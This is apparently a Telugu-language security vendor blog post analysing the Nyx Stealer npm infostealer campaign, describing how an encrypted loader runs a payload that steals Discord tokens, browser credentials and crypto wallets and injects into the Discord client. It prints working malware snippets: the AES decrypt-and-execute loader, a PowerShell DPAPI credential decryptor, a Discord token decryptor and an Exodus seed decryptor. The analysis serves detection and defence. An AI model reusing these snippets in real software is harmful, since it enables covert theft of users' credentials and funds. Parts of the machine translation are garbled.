npm ఇన్ఫోస్టీలర్

కొత్త npm ఇన్ఫోస్టీలర్ ఆవిష్కరణ: నిక్స్ స్టీలర్ డిస్కార్డ్ సెషన్‌లను హైజాక్ చేసింది

విషయ సూచిక

తప్పక చదవాల్సిన పోస్ట్‌లు

ఆసక్తికరమైన తాజా పోస్ట్‌లు

TL; DR

క్సైజెని సెక్యూరిటీ రీసెర్చ్ టీమ్ రెండు హానికరమైన ప్యాకేజీల ద్వారా పంపబడిన ఒక అధునాతన npm ఇన్ఫోస్టీలర్ ప్రచారాన్ని గుర్తించాము: ఓదార్పు మరియు సెల్ఫ్‌బాట్-లోఫీ.

తాజా వెర్షన్ (consolelofy@1.3.0) ఇది 216KB AES-ఎన్‌క్రిప్టెడ్ పేలోడ్‌ను పొందుపరుస్తుంది, ఇది రన్‌టైమ్‌లో డీక్రిప్ట్ చేయబడి, దీని ద్వారా అమలు చేయబడుతుంది vm.runInNewContext()హానికరమైన లాజిక్ పూర్తిగా ఎన్‌క్రిప్ట్ చేయబడినందున, స్ట్రింగ్ ఇన్‌స్పెక్షన్‌పై ఆధారపడే స్టాటిక్ స్కానర్‌లు ఎగ్జిక్యూషన్ సమయం వరకు దాని ప్రవర్తనను గమనించలేవు.

ఒకసారి డీక్రిప్ట్ చేసిన తర్వాత, అంతర్గతంగా బ్రాండ్ చేయబడిన పేలోడ్ నిక్స్ దొంగ, లక్ష్యాలు:

  • డిస్కార్డ్ ప్రామాణీకరణ టోకెన్లు
  • 50+ బ్రౌజర్ ఆధారాల నిల్వలు
  • 90+ క్రిప్టోకరెన్సీ వాలెట్ ఎక్స్‌టెన్షన్‌లు
  • రోబ్లాక్స్, ఇన్‌స్టాగ్రామ్, స్పాటిఫై, స్టీమ్, టెలిగ్రామ్ మరియు టిక్‌టాక్ సెషన్‌లు
  • డిస్కార్డ్ డెస్క్‌టాప్ క్లయింట్ నిలకడ

రెండు ప్యాకేజీలలోని మొత్తం 20 వెర్షన్‌లు హానికరమైనవిగా నివేదించబడ్డాయి మరియు నిర్ధారించబడ్డాయి.

ఈ npm ఇన్ఫోస్టీలర్ యొక్క సాంకేతిక అవలోకనం

సాంప్రదాయ ఇన్‌స్టాల్-టైమ్ మాల్వేర్‌లా కాకుండా, ఈ క్యాంపెయిన్ ఒక దానిపై ఆధారపడి ఉంటుంది రన్టైమ్ డిక్రిప్షన్ మోడల్.

ఉన్నాయి:

  • దురుద్దేశం లేదు preinstall or postinstall hooks
  • ఇన్‌స్టాల్ సమయంలో స్పష్టమైన నెట్‌వర్క్ కాల్స్ లేవు
  • ప్లెయిన్‌టెక్స్ట్ క్రెడెన్షియల్ హార్వెస్టింగ్ లాజిక్ లేదు

మాడ్యూల్‌ను ఇంపోర్ట్ చేసినప్పుడు పేలోడ్ యాక్టివేట్ అవుతుంది. హానికరమైన కంటెంట్ మొత్తం ఎన్‌క్రిప్ట్ చేయబడి ఉంటుంది మరియు రన్‌టైమ్‌లో మాత్రమే మెమరీలో ప్రత్యక్షమవుతుంది.

ఈ డిజైన్ ప్యాకేజీ ఇన్‌స్టాలేషన్ సమయంలో గుర్తించడాన్ని ప్రత్యేకంగా నివారిస్తుంది.

ఈ npm ఇన్ఫోస్టీలర్ వాస్తవానికి ఎలా అమలు అవుతుంది

నిక్స్ స్టీలర్ ఏమి దొంగిలిస్తుందో విశ్లేషించే ముందు, మనం అర్థం చేసుకోవాలి అది ఎలా అమలు అవుతుంది.

ఈ npm infostealer లోని హానికరమైన తర్కం ఒక స్థిరమైన నమూనాను అనుసరిస్తుంది:

ఒక చిన్న లోడర్ ఒక పెద్ద ఎన్‌క్రిప్టెడ్ పేలోడ్‌ను డీక్రిప్ట్ చేసి, దానిని Node.js VM కాంటెక్స్ట్‌లో డైనమిక్‌గా ఎగ్జిక్యూట్ చేస్తుంది.

ఈ రూపకల్పన ఉద్దేశపూర్వకమైనది. దాడి చేసేవారు కేవలం అస్పష్టత వెనుక కార్యాచరణను దాచడం లేదు, వారు హానికరమైన కోడ్‌ను స్టాటిక్ విజిబిలిటీ నుండి పూర్తిగా తొలగించడం.

ఉన్నత-స్థాయి అమలు నమూనా

స్థూలంగా చెప్పాలంటే, ఈ వ్రాపర్ నాలుగు పనులు చేస్తుంది:

  • SHA-256ని ఉపయోగించి హార్డ్‌కోడెడ్ పాస్‌ఫ్రేజ్ నుండి AES కీని పొందుతుంది
  • AES-256-CBCని ఉపయోగించి ఒక పెద్ద హెక్స్-ఎన్‌కోడెడ్ సైఫర్‌టెక్స్ట్‌ను డీక్రిప్ట్ చేస్తుంది
  • డీక్రిప్ట్ చేయబడిన జావాస్క్రిప్ట్‌ను ఉపయోగించి అమలు చేస్తుంది vm.runInNewContext()
  • శక్తివంతమైన రన్‌టైమ్ ప్రిమిటివ్‌లను బహిర్గతం చేసే శాండ్‌బాక్స్‌ను అందిస్తుంది

ప్రధాన సాంకేతిక సారాంశం

కాంపోనెంట్ కాన్ఫిగరేషన్ / విలువ
అల్గారిథం AES-256-CBC
కీ వ్యుత్పత్తి SHA-256(పాస్‌ఫ్రేజ్)
ప్రారంభ వెక్టర్ (IV) 0x00 యొక్క 16 బైట్లు
అమలు vm.runInNewContext(decrypted, sandbox)

ముఖ్యంగా, ఈ శాండ్‌బాక్స్ వీటి గుండా వెళుతుంది:

  • require
  • process
  • Buffer
  • టైమర్లు
  • మాడ్యూల్ ఎగుమతులు

దీని అర్థం డీక్రిప్ట్ చేయబడిన పేలోడ్ ఈ క్రింది పూర్తి సామర్థ్యాన్ని కలిగి ఉంటుంది:

  • స్పాన్ ప్రక్రియలు
  • ఫైళ్లను చదవడం మరియు వ్రాయడం
  • నెట్‌వర్క్ కాల్స్ చేయండి
  • స్థానిక అప్లికేషన్‌లను సవరించండి

ఇది పరిమితం చేయబడిన VM కాదు. ఇది అమలును వేగవంతం చేయడానికి ఉపయోగించే ఒక VM.

రన్‌టైమ్ ఎన్‌క్రిప్షన్ ప్యాటర్న్ (కోర్ ఎగ్జిక్యూషన్ మెకానిజం)

లోడర్ చిన్నది.
దుష్ట శరీరం కాదు.

ప్యాకేజీలో కనిపించే అమలు నమూనా క్రింద ఇవ్వబడింది:

const crypto = require('crypto'); const vm = require('vm');  function decryptAndExecute(encryptedHex, passphrase) {     const key = crypto.createHash('sha256')                       .update(passphrase)                       .digest();      const iv = Buffer.alloc(16, 0);      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);     let decrypted = decipher.update(encryptedHex, 'hex', 'utf8');     decrypted += decipher.final('utf8');      const sandbox = {         require,         module,         exports,         console,         process,         Buffer,         __dirname,         __filename,         setTimeout,         setInterval,         clearTimeout,         clearInterval     };      vm.runInNewContext(decrypted, sandbox); }

వై దిస్ మ్యాటర్స్

డీక్రిప్ట్ చేయబడిన పేలోడ్:

  • డజ్ కాదు npm ప్యాకేజీ లోపల సాదా వచనంలో ఉంటుంది
  • సరళమైన దానికి కనిపించదు grep లేదా స్టాటిక్ స్ట్రింగ్ స్కానింగ్
  • రన్‌టైమ్‌లో మెమరీలో మాత్రమే రూపుదిద్దుకుంటుంది
  • పూర్తి నోడ్ రన్‌టైమ్ సామర్థ్యాలతో అమలు అవుతుంది

ఈ AES + VM ఎగ్జిక్యూషన్ కలయిక ఒక బలమైన ప్రవర్తనా సూచిక npm infostealer స్టాటిక్ తనిఖీని తప్పించుకోవడానికి ప్రయత్నిస్తోంది.

వేరే పదాల్లో:

మీరు ప్యాకేజీ సోర్స్ ట్రీని స్కాన్ చేస్తే, మీకు దొంగ కనిపించడు.
మీకు డీక్రిప్టర్ కనిపిస్తుంది.

డిక్రిప్షన్ తర్వాత ఏమి జరుగుతుంది

అమలు చేసిన తర్వాత, నిక్స్ స్టీలర్ సమాంతర డేటా సేకరణ తరంగాలను ప్రారంభిస్తుంది.

వేవ్ 1: బ్రౌజర్ క్రెడెన్షియల్ ఎక్స్‌ట్రాక్షన్

మాల్వేర్:

  • NuGet CDN నుండి పైథాన్ రన్‌టైమ్‌ను డౌన్‌లోడ్ చేస్తుంది
  • క్రిప్టోగ్రాఫిక్ లైబ్రరీలను ఇన్‌స్టాల్ చేస్తుంది
  • క్రోమియం ఆధారిత క్రెడెన్షియల్ స్టోర్‌లను వెలికితీస్తుంది
  • DPAPI-రక్షిత రహస్యాలను డీక్రిప్ట్ చేస్తుంది

నేటివ్ బైండింగ్‌లను కంపైల్ చేయడానికి బదులుగా, ఇది విండోస్ DPAPIని నేరుగా కాల్ చేయడానికి పవర్‌షెల్‌ను ఉపయోగించుకుంటుంది.

function dpapiUnprotectWithPowerShell(dataBuf) {     const b64 = dataBuf.toString('base64');      const ps =         "Add-Type -AssemblyName System.Security;" +         "$b=[Convert]::FromBase64String('" + b64 + "');" +         "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" +         "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" +         "[Console]::Out.Write([Convert]::ToBase64String($p))";      const cmd =         `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`;      return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); }

ఈ విధానం:

  • సంకలన లోపాలను నివారిస్తుంది
  • స్థానిక విండోస్ క్రిప్టో APIలను ఉపయోగిస్తుంది
  • పరిపాలనా సాధనాలలో కలిసిపోతుంది

ఇది OS-స్థాయి క్రెడెన్షియల్ డీక్రిప్షన్, స్క్రాపింగ్ కాదు.

వేవ్ 2: డిస్కార్డ్ టోకెన్ డీక్రిప్షన్

స్టీలర్‌కు ప్రోటోకాల్ గురించి తెలుసు. అది డిస్కార్డ్ యొక్క ఎన్‌క్రిప్టెడ్ టోకెన్ ఫార్మాట్‌ను అర్థం చేసుకుంటుంది.

function decryptToken(encryptedToken, key) {     const tokenParts = encryptedToken.split('dQw4w9WgXcQ:');     const encryptedData = Buffer.from(tokenParts[1], 'base64');      const iv = encryptedData.slice(3, 15);     const ciphertext = encryptedData.slice(15, -16);     const tag = encryptedData.slice(-16);      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);     decipher.setAuthTag(tag);      return decipher.update(ciphertext).toString('utf8'); }

కార్యాచరణ ప్రవాహం:

  • డిస్కార్డ్ నుండి మాస్టర్ కీని సంగ్రహించండి Local State
  • DPAPI ద్వారా మాస్టర్ కీని డీక్రిప్ట్ చేయండి
  • AES-GCM టోకెన్ బ్లాబ్‌లను డీక్రిప్ట్ చేయండి
  • డిస్కార్డ్ APIకి వ్యతిరేకంగా టోకెన్‌లను ధృవీకరించండి
  • నైట్రో, బ్యాడ్జ్‌లు, బిల్లింగ్ సమాచారంతో సుసంపన్నం అవ్వండి

ఇది సాధారణ క్రెడెన్షియల్ డంపింగ్ కాదు. ఇది ప్రోటోకాల్‌ను పరిగణనలోకి తీసుకునే సెషన్ హైజాకింగ్.

వేవ్ 3: క్రిప్టోకరెన్సీ వాలెట్ టార్గెటింగ్

npm infostealer ఈ క్రింది వాటిని జాబితా చేస్తుంది:

  • 90+ బ్రౌజర్ వాలెట్ పొడిగింపులు
  • 27 డెస్క్‌టాప్ వాలెట్లు
  • కోల్డ్ వాలెట్ మార్గాలు
  • నిర్గమకాండ విత్తన ఫైళ్ళు

సీడ్ డీక్రిప్షన్ ప్రయత్నానికి ఉదాహరణ:

function decryptSeco(content, password) {     const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512');      const decipher = crypto.createDecipheriv(         'aes-256-gcm',         key,         content.slice(0, 12)     );      decipher.setAuthTag(content.slice(-16));      return Buffer.concat([         decipher.update(content.slice(12, -16)),         decipher.final()     ]).toString('utf8'); }

విజయవంతమైతే, వాలెట్ రాజీ తక్షణమే మరియు కోలుకోలేనిదిగా ఉంటుంది.

ఇది ప్రచారంలో అత్యధిక విలువ కలిగిన ఆదాయ మార్గాన్ని సూచిస్తుంది.

డిస్కార్డ్ డెస్క్‌టాప్ ఇంజెక్షన్ ద్వారా నిలకడ

క్రెడెన్షియల్స్‌ను సేకరించిన తర్వాత, నిక్స్ స్టీలర్ స్థానిక డేటాను సవరించడం ద్వారా కొనసాగింపును ప్రయత్నిస్తుంది. అసమ్మతి క్లయింట్.

టార్గెట్:

%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js

ఆపరేషనల్ సీక్వెన్స్

ఇన్ఫోస్టీలర్ కింది దశలను నిర్వహిస్తుంది:

  • నడుస్తున్న డిస్కార్డ్ ప్రాసెస్‌లను ముగిస్తుంది
  • ఇన్‌స్టాల్ చేయబడిన డిస్కార్డ్ వేరియంట్‌లను (స్టేబుల్, కెనరీ, PTB) గుర్తిస్తుంది
  • తిరిగి వ్రాస్తుంది discord_desktop_core/index.js
  • దాడి చేసేవారి నియంత్రణలో ఉన్న వెబ్‌హుక్ లాజిక్‌ను చొప్పిస్తుంది
  • డిస్కార్డ్‌ను పునఃప్రారంభించండి

ఇది భవిష్యత్ డిస్కార్డ్ సెషన్‌లలో కొత్త ప్రమాణీకరణ టోకెన్‌లు స్వయంచాలకంగా విడుదలయ్యేలా నిర్ధారిస్తుంది.

ముఖ్యంగా, ఈ నిలకడ షెడ్యూల్ చేయబడిన పనులు లేదా రిజిస్ట్రీ మార్పులపై ఆధారపడదు. ఇది అప్లికేషన్-స్థాయి కోడ్ మార్పును ఉపయోగించుకుంటుంది, ఇది మరింత రహస్యమైన విధానం.

హానికరమైన npm ప్యాకేజీని తర్వాత తొలగించినప్పటికీ, డిస్కార్డ్ క్లయింట్ ప్రమాదంలోనే ఉంటుంది.

సాంకేతిక పోలిక: చట్టబద్ధమైన సెల్ఫ్‌బాట్ vs npm ఇన్ఫోస్టీలర్

కాంపోనెంట్ లెజిటిమేట్ లైబ్రరీ Nyx npm Infostealer
ఎన్క్రిప్షన్ గమనిక పూర్తి AES-ఎన్‌క్రిప్టెడ్ పేలోడ్
రన్‌టైమ్ VM అవసరం లేదు vm.runInNewContext అమలు
ఆధారాల యాక్సెస్ డిస్కార్డ్ API మాత్రమే బ్రౌజర్, వాలెట్లు, DPAPI
బాహ్య డౌన్‌లోడ్‌లు తోబుట్టువుల NuGet ద్వారా పైథాన్ రన్‌టైమ్
పట్టుదల తోబుట్టువుల డిస్కార్డ్ క్లయింట్ ఇంజెక్షన్
మోనటైజేషన్ బాట్ ఆటోమేషన్ క్రెడెన్షియల్ పునఃవిక్రయం

కేవలం ఎన్‌క్రిప్షన్ పొర మాత్రమే ఈ క్యాంపెయిన్‌ను ఒక సాధారణ ఓపెన్-సోర్స్ ఫోర్క్ నుండి వేరు చేస్తుంది.

ఒక చట్టబద్ధమైన డిస్కార్డ్ సెల్ఫ్‌బాట్‌కు దాని మొత్తం కోడ్‌బేస్‌ను ఎన్‌క్రిప్ట్ చేయడానికి, DPAPIని యాక్సెస్ చేయడానికి పవర్‌షెల్‌ను ప్రారంభించడానికి, బాహ్య రన్‌టైమ్‌లను డౌన్‌లోడ్ చేయడానికి లేదా డెస్క్‌టాప్ అప్లికేషన్ అంతర్గత భాగాలను సవరించడానికి ఎటువంటి కారణం ఉండదు. డిస్కార్డ్ ఇంటరాక్షన్‌లను ఆటోమేట్ చేస్తుందని చెప్పుకునే ఒక డిపెండెన్సీలో ఆ సామర్థ్యాలు కనిపించినప్పుడు, ఆ నిర్మాణపరమైన అసంగతత్వాన్ని విస్మరించడం అసాధ్యం అవుతుంది.

దర్యాప్తు కోణం నుండి చూస్తే, ఈ npm ఇన్ఫోస్టీలర్ అనేక పొరలలో ఆనవాళ్లను వదిలివేస్తుంది. అయితే, అత్యంత విశ్వసనీయమైన సూచికలు హార్డ్‌కోడ్ చేసిన URLలు లేదా నిర్దిష్ట ఫైల్ పాత్‌లు కావు, ఎందుకంటే అవి వెర్షన్‌ల మధ్య మారవచ్చు. దానికి బదులుగా, శాశ్వతమైన సంకేతాలు నిర్మాణాత్మకంగా ఉంటాయి.

ప్యాకేజీ స్థాయిలో, అతిపెద్ద ప్రమాద సూచిక ఏమిటంటే, ఒక పెద్ద ఎన్‌క్రిప్టెడ్ పేలోడ్ మరియు వెంటనే అమలు అయ్యే ఒక రన్‌టైమ్ డిక్రిప్షన్ వ్రాపర్ కలయిక. vm.runInNewContext()కేవలం ఎన్‌క్రిప్షన్ చేయడం స్వతహాగా హానికరమైనది కానప్పటికీ, ఒక డిస్కార్డ్ యుటిలిటీ ప్యాకేజీలో AES డిక్రిప్షన్ చేసి, ఆ తర్వాత డైనమిక్ VM ఎగ్జిక్యూషన్‌ను ఉపయోగించడం అత్యంత అసాధారణమైనది.

హోస్ట్ స్థాయిలో, అనుమానాస్పద నమూనాలలో ఊహించని DPAPI డీక్రిప్షన్ కార్యాచరణ, Node.js డిపెండెన్సీ కాంటెక్స్ట్ నుండి ప్రాసెస్ స్పాన్ అవ్వడం, మరియు థర్డ్-పార్టీ లైబ్రరీల ద్వారా ఎప్పటికీ మార్చకూడని స్థానిక అప్లికేషన్ ఫైళ్ళను సవరించడం వంటివి ఉంటాయి. అదేవిధంగా, నెట్‌వర్క్ లేయర్‌లో, డెవలప్‌మెంట్ డిపెండెన్సీ ద్వారా ప్రారంభించబడిన అవుట్‌బౌండ్ వెబ్‌హుక్-శైలి కమ్యూనికేషన్ మరొక ముఖ్యమైన అసాధారణతను సూచిస్తుంది.

మరో మాటలో చెప్పాలంటే, డిటెక్షన్ సర్ఫేస్ అనేది రాజీకి ఒకే ఒక్క సూచిక కాదు. ఎన్‌క్రిప్షన్, రన్‌టైమ్ ఎగ్జిక్యూషన్, క్రెడెన్షియల్ యాక్సెస్ మరియు పర్సిస్టెన్స్ బిహేవియర్‌ల మధ్య ఉన్న పరస్పర సంబంధమే ముప్పును బయటపెడుతుంది.

Xygeniతో గుర్తింపు మరియు నివారణ

npm ఇన్ఫోస్టీలర్

ఈ npm ఇన్ఫోస్టీలర్‌ను గుర్తించడం జరిగింది Xygeni యొక్క మాల్వేర్ ముందస్తు హెచ్చరిక (MEW) సాధారణ సిగ్నేచర్ మ్యాచింగ్ కాకుండా, పొరలు పొరలుగా ఉన్న ప్రవర్తనా సహసంబంధం ద్వారా.

తెలిసిన హానికరమైన స్ట్రింగ్‌ల కోసం శోధించడానికి బదులుగా, MEW పూర్తి సోర్స్ ట్రీ అంతటా నిర్మాణపరమైన అసాధారణతలను మూల్యాంకనం చేస్తుంది. ఈ సందర్భంలో, అనేక సంకేతాల కలయిక నుండి గుర్తింపు వెలువడింది: మాడ్యూల్ ఎంట్రీ పాయింట్‌లో పొందుపరిచిన AES డీక్రిప్షన్ రొటీన్, VM కాంటెక్స్ట్‌లో తక్షణ అమలు, మరియు సామర్థ్యానికి-ఉద్దేశానికి మధ్య స్పష్టమైన పొంతన లేకపోవడం.

ముఖ్యంగా, ఈ సంకేతాలలో ఏ ఒక్కటీ దురుద్దేశాన్ని నిరూపించదు. అయితే, వాటన్నింటినీ కలిపి విశ్లేషించినప్పుడు, అవి రన్‌టైమ్ ప్రవర్తనను దాచిపెట్టే ప్రయత్నాన్ని బయటపెడతాయి. ఈ బహుళ అంచెల విధానం, అధిక విశ్వసనీయత గల సరఫరా గొలుసు ముప్పులను గుర్తిస్తూనే, తప్పుడు సానుకూల ఫలితాలను (false positives) గణనీయంగా తగ్గిస్తుంది.

అంతేకాకుండా, కేవలం ఇన్‌స్టాల్ సమయంలో చేసే తనిఖీ ఎందుకు సరిపోదో ఈ కేసు వివరిస్తుంది. హానికరమైన లాజిక్ లైఫ్‌సైకిల్ స్క్రిప్ట్‌లలో ఉండదు. అది మాడ్యూల్ లోడ్ అయిన తర్వాత మాత్రమే యాక్టివేట్ అవుతుంది మరియు మెమరీలో డీక్రిప్ట్ అయిన తర్వాత మాత్రమే కనిపిస్తుంది. అందువల్ల, సమర్థవంతమైన రక్షణకు ఎన్‌క్రిప్షన్‌ను పరిగణనలోకి తీసుకునే విశ్లేషణ, ప్రవర్తనా సరళిని గుర్తించడం, మరియు ఇన్‌స్టాలేషన్ ఈవెంట్‌లకు మించి నిరంతర డిపెండెన్సీ పర్యవేక్షణ అవసరం.

రిజిస్ట్రీ తొలగింపు అనేది ప్రతిచర్యాత్మకమైనది. రన్‌టైమ్‌ను పరిగణనలోకి తీసుకునే విశ్లేషణ నివారణాత్మకమైనది.

ఈ npm ఇన్ఫోస్టీలర్ ఎందుకు ముఖ్యమైనది

Nyx Stealer అనేది npm-ఆధారిత మాల్వేర్‌లో ఒక నిర్మాణాత్మక పరిణామాన్ని సూచిస్తుంది.

గతంలో, అనేక హానికరమైన ప్యాకేజీలు కనిపించే ఇన్‌స్టాల్-టైమ్ స్క్రిప్ట్‌లు లేదా సుస్పష్టమైన క్రెడెన్షియల్ ఎక్స్‌ఫిల్ట్రేషన్ ఎండ్‌పాయింట్‌లపై ఆధారపడేవి. దీనికి విరుద్ధంగా, ఈ క్యాంపెయిన్ తన పేలోడ్‌ను ఎన్‌క్రిప్ట్ చేస్తుంది, ఎగ్జిక్యూషన్‌ను రన్‌టైమ్‌కు వాయిదా వేస్తుంది, చట్టబద్ధమైన ఆపరేటింగ్ సిస్టమ్ APIలను ఉపయోగించుకుంటుంది మరియు విశ్వసనీయ అప్లికేషన్‌లలో స్థిరత్వాన్ని నెలకొల్పుతుంది.

ఫలితంగా, దాడి చేసేవారు npm ఇన్‌ఫ్రాస్ట్రక్చర్‌ను స్వయంగా దుర్వినియోగం చేయవలసిన అవసరం లేదు. దానికి బదులుగా, డిపెండెన్సీ ఇన్‌స్టాలేషన్ నమ్మకాన్ని సూచిస్తుంది కాబట్టి దాడి విజయవంతమవుతుంది. ఒక లైబ్రరీని ఇంపోర్ట్ చేయడం సురక్షితమైన చర్య అని డెవలపర్లు భావిస్తారు, ప్రత్యేకించి అది ఒక ప్రముఖ టూల్ యొక్క నమ్మశక్యమైన ఫోర్క్‌గా కనిపించినప్పుడు.

ఎకోసిస్టమ్‌లు పెరుగుతూ, ఫోర్క్‌లు విస్తరిస్తున్న కొద్దీ, ఆ అంతర్లీన విశ్వాస పరిధి దాడికి మరింత ఆకర్షణీయమైన ఉపరితలంగా మారుతుంది. అందువల్ల, ఆధునిక npm ఇన్ఫోస్టీలర్‌ల నుండి రక్షించుకోవడానికి, స్టాటిక్ స్ట్రింగ్‌ల కోసం వెతకడం కంటే ఆర్కిటెక్చరల్ ప్యాటర్న్‌లను గుర్తించడం అవసరం.

అంతిమంగా, ఈ ప్రచారం ఒక కీలకమైన పాఠాన్ని పునరుద్ఘాటిస్తుంది software supply chain securityమొదటి చూపులో దురుద్దేశపూర్వకంగా కనిపించేవి అత్యంత ప్రమాదకరమైన ముప్పులు కావు, కానీ రన్‌టైమ్ వాటి నిజ స్వరూపాన్ని వెల్లడించే వరకు నిర్మాణాత్మకంగా చట్టబద్ధమైనవిగా కనిపించేవే అత్యంత ప్రమాదకరమైనవి.

sca-tools-software-composition-analysis-tools
మీ సాఫ్ట్‌వేర్ ప్రమాదాలకు ప్రాధాన్యత ఇవ్వండి, వాటిని పరిష్కరించండి మరియు సురక్షితం చేయండి.
మీ ఉచిత ఖాతాను పొందండి.
క్రెడిట్ కార్డ్ అవసరం లేదు.

మీ సాఫ్ట్‌వేర్ అభివృద్ధి మరియు డెలివరీని సురక్షితం చేసుకోండి

Xygeni ఉత్పత్తి శ్రేణితో